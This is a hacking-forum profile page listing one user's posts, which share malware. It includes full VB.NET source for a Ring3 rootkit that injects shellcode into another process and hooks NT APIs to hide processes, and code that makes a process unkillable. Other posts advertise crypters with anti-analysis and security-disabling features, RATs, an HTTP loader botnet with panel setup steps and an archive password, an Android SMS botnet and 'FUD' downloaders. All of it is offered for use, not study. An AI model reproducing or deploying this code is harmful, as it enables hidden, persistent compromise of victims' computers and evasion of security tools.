H4ckCoder

LvL-23
  • Content Count

    119
  • Avg. Content Per Day

    0
  • Joined

  • Last visited

Community Reputation

2,309 Excellent

About H4ckCoder

  • Rank
    Made in DZ
  • Birthday 03/03/1992

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. hi, me pass javascript downloader script, this download does work

  2. H4ckCoder

    [Au3] RunTime / ScanTime Crypter by nateko

    Re: [Au3] RunTime / ScanTime Crypter by nateko This is because of XOR encryption :p
  3. H4ckCoder

    Best RAT

    Re: Best RAT NetWire RAT the best ,Multi-Platform :)
  4. H4ckCoder

    [Delphi] DH Crypter 1.0 Source

    [+] Generador de key para el cifrado [+] Delay [+] Startup del archivo [+] Ocultar archivo [+] Melt File [+] Mensajes falsos [+] Ejecutar comandos [+] Matar procesos [+] Abrir URL [+] Descargar y ejecutar archivos [+] File Pumper,Extension Spoofer & Icon Changer [+] Antis : [++] Virtual PC [++] Virtual Box [++] Debug [++] Wireshark [++] OllyDg [++] Anubis [++] Kaspersky [++] VMware [+] Disables : [++] UAC [++] Firewall [++] CMD [++] Run [++] Taskmgr [++] Regedit [++] Updates [!] Creditos : Doddy Hackman [++] steve10120 [ RunPE ] [HIDE-THANKS][Hidden Content]] [Hidden Content]
  5. H4ckCoder

    VB.NET Ring3 Rootkit

    [HIDE-THANKS] Module VbRootkit '***************** 'CREATOR: Menalix 'SITE: Menalix.com 'If used please give proper credits. '***************** #Region "WinAPI's" Private Declare Function CloseHandle Lib "kernel32" (ByVal pHandle As IntPtr) As Boolean Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Integer, ByVal bInheritHandle As Boolean, ByVal dwProcessId As UInteger) As IntPtr Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByRef lpNumberOfBytesRead As UInteger) As Boolean Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByRef lpNumberOfBytesWritten As UInteger) As Boolean Private Declare Function VirtualProtectEx Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As UInteger, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean Private Declare Function Module32Next Lib "kernel32" (ByVal hSnapshot As IntPtr, ByRef lpme As MODULEENTRY32) As Boolean Private Declare Function Module32First Lib "kernel32" (ByVal hSnapshot As IntPtr, ByRef lpme As MODULEENTRY32) As Boolean Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As UInteger, ByVal u32ProcessId As UInteger) As IntPtr Private Declare Function VirtualAllocEx Lib "kernel32" ( _ ByVal hProcess As IntPtr, _ ByVal lpAddress As IntPtr, _ ByVal dwSize As UInteger, _ ByVal flAllocationType As UInteger, _ ByVal flProtect As UInteger) As IntPtr #End Region #Region "Structures" Structure MODULEENTRY32 Dim U32Size As UInteger Dim Th32ModuleId As UInteger Dim Th32ProcessId As UInteger Dim GlblcntUsage As UInteger Dim ProccntUsage As UInteger Dim ModBaseAddr As IntPtr Dim ModBaseSize As UInteger Dim HModule As IntPtr Dim SzModule As String Dim SzeExePath As String End Structure #End Region Sub Main() Console.Title = "Hook Test Application" Console.WriteLine("Press enter, and the hook will be done!") Console.ReadLine() HookApplication("prckiller3") Console.ReadLine() End Sub Private Function ReadMemoryByte(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal nSize As UInteger) As Byte() Dim Buffer(CInt(nSize - 1)) As Byte ReadProcessMemory(hProcess, lpBaseAddress, Buffer, nSize, Nothing) Return Buffer End Function Private Function RemoteGetProcAddressManual(ByVal hProcess As IntPtr, ByVal ModuleAddress As UInteger, ByVal Export As String) As UInteger 'PE Header relative declarations Dim PEHeaderOffset As UInteger = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(ModuleAddress + &H3C, IntPtr), 4), 0) Dim ExportRVA As UInteger = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(ModuleAddress + PEHeaderOffset + &H78, IntPtr), 4), 0) Dim IExportDir() As Byte = ReadMemoryByte(hProcess, CType(ModuleAddress + ExportRVA, IntPtr), 40) Dim NamesCnt As Integer = BitConverter.ToInt32(IExportDir, 24) Dim Names As UInteger = BitConverter.ToUInt32(IExportDir, 32) + ModuleAddress Dim FuncAddress As UInteger = BitConverter.ToUInt32(IExportDir, 28) + ModuleAddress Dim Ordinals As UInteger = BitConverter.ToUInt32(IExportDir, 36) + ModuleAddress 'Empty declarations to use later Dim tpAddress, ApiAddress, Ord As UInteger Dim ApiString As String = Nothing Dim Ptr As IntPtr = Runtime.InteropServices.Marshal.AllocHGlobal(64) 'Searching for the Export For i = 1 To NamesCnt tpAddress = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(Names + ((i - 1) * 4), IntPtr), 4), 0) Runtime.InteropServices.Marshal.Copy(ReadMemoryByte(hProcess, CType(ModuleAddress + tpAddress, IntPtr), 64), 0, Ptr, 64) ApiString = Runtime.InteropServices.Marshal.PtrToStringAnsi(Ptr) Ord = BitConverter.ToInt16(ReadMemoryByte(hProcess, CType(Ordinals + ((i - 1) * 2), IntPtr), 2), 0) ApiAddress = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(FuncAddress + (Ord * 4), IntPtr), 4), 0) + ModuleAddress If String.Compare(ApiString, Export, True) = 0 Then Runtime.InteropServices.Marshal.FreeHGlobal(Ptr) Return ApiAddress End If Next Runtime.InteropServices.Marshal.FreeHGlobal(Ptr) Return Nothing End Function Private Function GetModuleBaseAddress(ByVal strProcess As String, ByVal strModule As String) As IntPtr Dim hSnapshot As IntPtr = CreateToolhelp32Snapshot(&H18, CUInt(Diagnostics.Process.GetProcessesByName(strProcess)(0).Id)) If hSnapshot = Nothing Then Return Nothing Dim me32Modules As New MODULEENTRY32 me32Modules.U32Size = CUInt(Runtime.InteropServices.Marshal.SizeOf(me32Modules)) If Module32First(hSnapshot, me32Modules) Then Do If Not me32Modules.ModBaseAddr.ToInt64 > &H7FFFFFFF Then If String.Compare(strModule, me32Modules.SzModule, True) = 0 Then Return me32Modules.ModBaseAddr Else End If Loop While (Module32Next(hSnapshot, me32Modules)) End If Return Nothing End Function Private Function CalculateOffset(ByVal DesAddress As Integer, ByVal SrcAddress As Integer) As Integer Return (DesAddress - SrcAddress) - 5 End Function Sub HookApplication(ByVal ProcessName As String) Const VariablesSize As Integer = 96 Dim ProcessHandle As IntPtr Dim MemoryBlockPtr As UInteger Dim Variables() As Byte = New Byte(VariablesSize) {} Dim fpGetProcessId As UInteger Dim fpGetCurrentProcessId As UInteger Dim lpProtectedAddress(3) As UInteger Dim ProtectedBuffer(3)() As Byte Dim OldProtect As UInteger = Nothing Dim WriteOffset As UInteger = Nothing Dim JmpOpCode() As Byte = {&HE9, Nothing, Nothing, Nothing, Nothing} Dim OpCodes()() As Byte = {NtReadVirtualMemory_AsmOpCode, NtOpenProcess_AsmOpCode, NtQuerySystemInformation_AsmOpCode} Dim OpCodesSize As UInteger = OpCodes(0).Length + OpCodes(1).Length + OpCodes(2).Length 'Alloc memory for our opcode and variables ProcessHandle = OpenProcess(&H8 + &H10 + &H20, False, CUInt(Diagnostics.Process.GetProcessesByName(ProcessName)(0).Id)) MemoryBlockPtr = CInt(VirtualAllocEx(ProcessHandle, Nothing, OpCodesSize + VariablesSize, &H3000, &H40)) 'Fill-in variables fpGetProcessId = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetProcessId")) fpGetCurrentProcessId = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetCurrentProcessId")) lpProtectedAddress(0) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtReadVirtualMemory")) lpProtectedAddress(1) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtOpenProcess")) lpProtectedAddress(2) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtQuerySystemInformation")) ProtectedBuffer(0) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), 24) ProtectedBuffer(1) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), 24) ProtectedBuffer(2) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), 24) BitConverter.GetBytes(fpGetProcessId).CopyTo(Variables, 0) BitConverter.GetBytes(fpGetCurrentProcessId).CopyTo(Variables, 4) BitConverter.GetBytes(Diagnostics.Process.GetCurrentProcess.Id).CopyTo(Variables, 8) BitConverter.GetBytes(lpProtectedAddress(0)).CopyTo(Variables, 12) BitConverter.GetBytes(lpProtectedAddress(1)).CopyTo(Variables, 16) BitConverter.GetBytes(lpProtectedAddress(2)).CopyTo(Variables, 20) ProtectedBuffer(0).CopyTo(Variables, 24) ProtectedBuffer(1).CopyTo(Variables, 24 + 24) ProtectedBuffer(2).CopyTo(Variables, 24 + 24 + 24) 'Write variables and opcode to memory block WriteOffset = MemoryBlockPtr WriteProcessMemory(ProcessHandle, WriteOffset, Variables, VariablesSize, Nothing) WriteOffset += VariablesSize For i = 0 To OpCodes.Length - 1 WriteProcessMemory(ProcessHandle, WriteOffset, OpCodes(i), CUInt(OpCodes(i).Length), Nothing) WriteOffset += OpCodes(i).Length Next 'Set memory page to execute code VirtualProtectEx(ProcessHandle, MemoryBlockPtr, OpCodesSize + VariablesSize, &H10, 0) 'Hook NtReadVirtualMemory WriteOffset = MemoryBlockPtr + VariablesSize BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(0))).CopyTo(JmpOpCode, 1) VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect) WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing) VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0) 'Hook NtOpenProcess WriteOffset += OpCodes(0).Length BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(1))).CopyTo(JmpOpCode, 1) VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect) WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing) VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0) 'Hook NtQuerySystemInformation WriteOffset += OpCodes(1).Length BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(2))).CopyTo(JmpOpCode, 1) VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect) WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing) VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0) ' clean up CloseHandle(ProcessHandle) End Sub #Region "AsmOpCode" Private NtReadVirtualMemory_AsmOpCode As Byte() = { _ &H55, &H8B, &HEC, &H83, &HEC, &H14, &H56, &HC7, &H45, &HF8, &H1, &H0, &H0, &HC0, &HE8, &H0, _ &H0, &H0, &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HFC, &HFF, &H75, &H18, &HFF, _ &H75, &H14, &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, &H75, &H8, &H8B, &H45, &HFC, &H83, &HC0, _ &H18, &HFF, &HD0, &H89, &H45, &HF8, &H83, &H7D, &HF8, &H0, &HF, &H8C, &HA8, &H0, &H0, &H0, _ &HFF, &H75, &H8, &H8B, &H45, &HFC, &HFF, &H10, &H8B, &HF0, &H8B, &H45, &HFC, &HFF, &H50, &H4, _ &H3B, &HF0, &H74, &HA, &H83, &H7D, &H8, &HFF, &HF, &H85, &H8A, &H0, &H0, &H0, &H83, &H65, _ &HF4, &H0, &HEB, &H7, &H8B, &H45, &HF4, &H40, &H89, &H45, &HF4, &H83, &H7D, &HF4, &H3, &H73, _ &H77, &H8B, &H45, &HF4, &H8B, &H4D, &HFC, &H83, &H7C, &H81, &HC, &H0, &H74, &H65, &H8B, &H45, _ &HF4, &H8B, &H4D, &HFC, &H8B, &H44, &H81, &HC, &H3B, &H45, &HC, &H72, &H56, &H8B, &H45, &HC, _ &H3, &H45, &H14, &H8B, &H4D, &HF4, &H8B, &H55, &HFC, &H39, &H44, &H8A, &HC, &H73, &H44, &H8B, _ &H45, &HF4, &H8B, &H4D, &HFC, &H8B, &H44, &H81, &HC, &H2B, &H45, &HC, &H89, &H45, &HF0, &H83, _ &H65, &HEC, &H0, &HEB, &H7, &H8B, &H45, &HEC, &H40, &H89, &H45, &HEC, &H83, &H7D, &HEC, &H18, _ &H73, &H21, &H8B, &H45, &HF4, &H6B, &HC0, &H18, &H8B, &H4D, &HFC, &H8D, &H44, &H1, &H18, &H8B, _ &H4D, &HEC, &H3, &H4D, &HF0, &H8B, &H55, &H10, &H8B, &H75, &HEC, &H8A, &H4, &H30, &H88, &H4, _ &HA, &HEB, &HD2, &HE9, &H7C, &HFF, &HFF, &HFF, &H8B, &H45, &HF8, &H5E, &HC9, &HC2, &H14, &H0} Private NtOpenProcess_AsmOpCode As Byte() = { _ &H55, &H8B, &HEC, &H51, &H51, &HC7, &H45, &HF8, &H1, &H0, &H0, &HC0, &HE8, &H0, &H0, &H0, _ &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HFC, &H83, &H7D, &H14, &H0, &H74, &H16, _ &H8B, &H45, &H14, &H8B, &H4D, &HFC, &H8B, &H0, &H3B, &H41, &H8, &H75, &H9, &HC7, &H45, &HF8, _ &H22, &H0, &H0, &HC0, &HEB, &H17, &HFF, &H75, &H14, &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, _ &H75, &H8, &H8B, &H45, &HFC, &H83, &HC0, &H30, &HFF, &HD0, &H89, &H45, &HF8, &H8B, &H45, &HF8, _ &HC9, &HC2, &H10, &H0} Private NtQuerySystemInformation_AsmOpCode As Byte() = { _ &H55, &H8B, &HEC, &H83, &HEC, &H1C, &H56, &H57, &HC7, &H45, &HEC, &H1, &H0, &H0, &HC0, &HE8, _ &H0, &H0, &H0, &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HF0, &HFF, &H75, &H14, _ &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, &H75, &H8, &H8B, &H45, &HF0, &H83, &HC0, &H48, &HFF, _ &HD0, &H89, &H45, &HEC, &H83, &H7D, &HEC, &H0, &HF, &H8C, &H4E, &H1, &H0, &H0, &H83, &H7D, _ &H8, &H5, &H75, &H5D, &H83, &H65, &HF8, &H0, &H8B, &H45, &HC, &H89, &H45, &HF4, &H8B, &H45, _ &HF4, &H83, &H38, &H0, &H74, &H46, &H8B, &H45, &HF4, &H89, &H45, &HF8, &H8B, &H45, &HF8, &H8B, _ &H4D, &HF8, &H3, &H8, &H89, &H4D, &HF4, &H8B, &H45, &HF4, &H8B, &H4D, &HF0, &H8B, &H40, &H44, _ &H3B, &H41, &H8, &H75, &H25, &H8B, &H45, &HF4, &H83, &H38, &H0, &H75, &H8, &H8B, &H45, &HF8, _ &H83, &H20, &H0, &HEB, &HF, &H8B, &H45, &HF8, &H8B, &H0, &H8B, &H4D, &HF4, &H3, &H1, &H8B, _ &H4D, &HF8, &H89, &H1, &H8B, &H45, &HF8, &H89, &H45, &HF4, &HEB, &HB2, &HE9, &HEB, &H0, &H0, _ &H0, &H83, &H7D, &H8, &H10, &HF, &H85, &HE1, &H0, &H0, &H0, &H8B, &H45, &HC, &H89, &H45, _ &HFC, &H83, &H65, &HE8, &H0, &HEB, &H7, &H8B, &H45, &HE8, &H40, &H89, &H45, &HE8, &H8B, &H45, _ &HFC, &H8B, &H4D, &HE8, &H3B, &H8, &HF, &H83, &HC0, &H0, &H0, &H0, &H8B, &H45, &HE8, &HC1, _ &HE0, &H4, &H8B, &H4D, &HFC, &H8B, &H55, &HF0, &H8B, &H44, &H1, &H4, &H3B, &H42, &H8, &HF, _ &H85, &HA2, &H0, &H0, &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &HC6, &H44, _ &H1, &H9, &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &H10, _ &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H33, &HC9, &H8B, &H55, &HFC, &H66, &H89, &H4C, &H2, _ &HA, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &HC, &H0, &H8B, _ &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &HC6, &H44, &H1, &H8, &H0, &H8B, &H45, &HE8, _ &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &H4, &H0, &H8B, &H45, &HE8, &H89, &H45, _ &HE4, &HEB, &H7, &H8B, &H45, &HE4, &H40, &H89, &H45, &HE4, &H8B, &H45, &HFC, &H8B, &H4D, &HE4, _ &H3B, &H8, &H73, &H21, &H8B, &H45, &HE4, &H40, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H8D, &H74, _ &H1, &H4, &H8B, &H45, &HE4, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H8D, &H7C, &H1, &H4, &HA5, _ &HA5, &HA5, &HA5, &HEB, &HCE, &H8B, &H45, &HFC, &H8B, &H0, &H48, &H8B, &H4D, &HFC, &H89, &H1, _ &H8B, &H45, &HE8, &H48, &H89, &H45, &HE8, &HE9, &H2B, &HFF, &HFF, &HFF, &H8B, &H45, &HEC, &H5F, _ &H5E, &HC9, &HC2, &H10, &H0} #End Region End Module > [/HIDE-THANKS]
  6. H4ckCoder

    [VB.NET] Unkillable Process

    [HIDE-THANKS] Imports System.Runtime.InteropServices Public Class ProtectMe #Region "VarPtr Support by Francesco Balena & Code Architects" ' ----------------------------------------------------------- ' VARPTR implementation in VB.NET ' Part of VB Migration Partner’s support library ' By Rottweiler ' ----------------------------------------------------------- Private Delegate Function VarPtrCallbackDelegate(ByVal address As Integer, ByVal unused1 As Integer, ByVal unused2 As Integer, ByVal unused3 As Integer) As Integer Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal wndProc As VarPtrCallbackDelegate, ByRef var As Short, _ ByVal unused1 As Integer, ByVal unused2 As Integer, _ ByVal unused3 As Integer) As Integer Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal wndProc As VarPtrCallbackDelegate, ByRef var As Integer, _ ByVal unused1 As Integer, ByVal unused2 As Integer, _ ByVal unused3 As Integer) As Integer Private Shared Function VarPtrCallback(ByVal address As Integer, ByVal unused1 As Integer, ByVal unused2 As Integer, ByVal unused3 As Integer) As Integer Return address End Function Private Shared Function VarPtr(ByRef var As Short) As Integer Return CallWindowProc(AddressOf VarPtrCallback, var, 0, 0, 0) End Function Private Shared Function VarPtr(ByRef var As Integer) As Integer Return CallWindowProc(AddressOf VarPtrCallback, var, 0, 0, 0) End Function #End Region Private Shared Function GetCurrentProcess() As IntPtr End Function Private Shared Function ZwSetInformationProcess(ByVal _1 As IntPtr, ByVal _2 As IntPtr, ByVal _3 As IntPtr, ByVal _4 As IntPtr) As IntPtr End Function Public Shared Sub Protect() ZwSetInformationProcess(GetCurrentProcess(), &H21&, VarPtr(&H8000F129), &H4&) End Sub End Class > [/HIDE-THANKS]
  7. Schwarze Sonne Rootkit Coder: Slayer616 Language: Visual Basic 6/Delphi 7.2 Credits: Magic Aphex Cobein Schwarze Sonne Rootkit was developed to hide and protect your Software securely. You can install important Software Components silently, so the User cant even notice where your Files are stored. Functions: -modular Multilanguage -Profile System -Kewl Ribbon GUI *HOT* -Hide Processes/Files -Protect Processes/Files -Block Processes -Usermode API Unhook (Bypass Sandboxies, lowgrade AV/FWs) //not included -Installation -Startup -Self Protection -cryptable Rootkit! *HOT* -XP/Vista compitable! -OPENSOURCE::::>Customizable. [HIDE-THANKS][Hidden Content]]
  8. Gaudox HTTP Gaudox is a HTTP loader completely coded from scratch in C/C++ language with a few lines of Assembly, which means that it does not require of any dependencies ( C-Runtime, NET Framework, Java VM ). The bot has been fully tested and working on all Windows versions from Windows XP SP2 to Windows 10 (32/64-bit). It is also worth mentioning that I coded this bot with very efficient and stable designed code to handle thousands of connections at once. Features: Usermode Rootkit Bot has Rootkit functionality which hides all bot resources and prevents from being accessed from explorer process. This feature does not drop any to disk, the code is internally embedded in the bot file and injected in the target process from memory. It is also has self-protection that prevents the hooks from being removed by third-party programs or any security tool. This feature is currently working on 32-bit systems. Persistence/Watchdog Bot prevents it from being removed from the system by bot killers, security tools or user actions. This feature is currently supporting process protection and working on both 32/64-bit systems but its maximum compatibility is in 32-bit. Traffic Encrypted The communication between the bot and the control panel is obfuscated. This prevents middle attacks. Anti-Analysis/Research Bot contains several methods for preventing from being analyzed by researchers or unauthorized users. some methods are from preventing static analysis by obfuscating code, data up to detect the presence of debuggers, avoid running the bot in virtualized environments, etc. some methods may not be mentioned. Commands: [+] Download and execute (Drop&Exec) [+] Visit Website (Visible) [+] Update Client [+] Uninstall Client Panel Builder File is Cleaned @CrypterHacker [HIDE-THANKS][Hidden Content]] pass : 58C1DC678A0B816AAB7E569F70E2E40A How to install: 1) Open the Builder and create a new profile, you will use these values KEY #1 and KEY #2 in the panel. 2) Create a new database (recommended) 2) Open setup.php with browser and complete the form. 3) Delete setup.php and open login.php with browser. 5) When creating the bot clients do not forget to use the same profile you used to install the panel, otherwise the bots will not connect to the panel. > Bot * Fixed issue with Uninstall command * Anti-Virtual machine methods have been enabled Panel * Fixed issue with location * Added captcha in login page
  9. - Ring3 Rootkit Includes Rootkit functionality, which hides all of its components from explorer process. also worth mentioning that the rootkit prevents from being removed from the system and it's not implemented as a separate file so the bot will not write any file to the harddisk. this feature is currently working only in 32-bit versions (XP-8.1). - Persistence/Watchdog This prevents it from being removed from the system by ensuring that the process is always running on the system. Maximum compatibility of this feature is when the bot runs with administrator privileges. - Traffic encrypted The communication between the bot and the web panel is now encrypted. - Web panel recoded The panel has been completely recoded using PDO which makes it safer preventing SQL injection and other attacks. Download [VERDE]File Cleaned[/VERDE] Analysed for Caballo [HIDE-THANKS][Hidden Content] ([Hidden Content])[/HIDE-THANKS] How to install: 1) Open the builder and create a new profile, you will use these values Key1 and Key2 in the panel. 2) Create a database 2) Open setup.php 3) After installing go to login.php, delete setup.php 5) When creating the bot clients, do not forget to use the same profile you used to install the panel, otherwise the bots will not connect to the panel.
  10. H4ckCoder

    SmsBot Android Botnet

    [VERDE]File cleaned[/VERDE] analysed for caballo [HIDE-THANKS][Hidden Content]] Password: [HIDE-THANKS]opensc.ws[/HIDE-THANKS]
  11. H4ckCoder

    Falcon Downloader Delphi C++

    [HIDE-THANKS][Hidden Content]]
  12. H4ckCoder

    delphi File To Bytestring Converter

    [HIDE-THANKS][Hidden Content]]
  13. H4ckCoder

    vb6 Viotto Binder 1.1 SRC

    [HIDE-THANKS][Hidden Content]]
  14. H4ckCoder

    vb6 Downloader FUD src

    [HIDE-THANKS] [Hidden Content]]
  15. H4ckCoder

    AU3 -Rat-simple

    [HIDE-THANKS][Hidden Content]]